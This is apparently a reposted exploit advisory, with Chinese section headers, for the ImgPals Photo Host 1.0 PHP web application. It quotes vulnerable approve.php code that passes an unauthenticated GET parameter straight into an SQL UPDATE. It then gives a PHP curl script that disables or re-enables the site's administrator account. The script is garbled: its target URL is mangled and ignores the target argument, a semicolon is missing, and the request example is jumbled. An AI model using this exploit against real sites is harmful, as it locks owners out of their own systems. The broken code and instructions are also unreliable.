ImgPals Photo Host Version 1.0 STABLE
作者: Corrado Liotta Aka CorryL
程序: ImgPals Photo Host
影响版本: 1.0 STABLE
开发这网站: http://www.imgpals.com/forum/
运行平台: Windows\Linux\Unix
...::[ 概述 ]::..
I released the ImgPals Photo Host Version 1.0 STABLE
Features Include:
    * Easy Install
    * Full README file included
    * Full Control Panel to control your site
    * User Side Features
          o Multiple JQuery Uploads
          o Create and Edit Photo Albums
          o Make Albums Public or Private
          o Describe Albums and Photos
          o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
          o Add Friends
          o Chat with Friends
          o Update people with status wall posting
          o Manage Profile
          o Profile Avatar Uploads
          o Private Messaging
    * And much more, be sure to check out the Demo
...::[ 漏洞 ]::..
A attaker can remotely disable the account from administratore not
allowing the same to be able to access the site
...::[证明]::..
 if ($_GET['a'] == 'app0'){
                 $sqlapprove = mysql_query("UPDATE members SET
approved = '0' WHERE id = '".$_GET['u']."'");
by sending the command approve.php? u = a = 1 & app0 a attaker can
disable the Administrator account.
...::[ Exploit ]::..
#!/usr/bin/php -f
<?php
//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on
$target = $argv[1];
$power = $argv[2]
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http:// www.2cto.com /approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>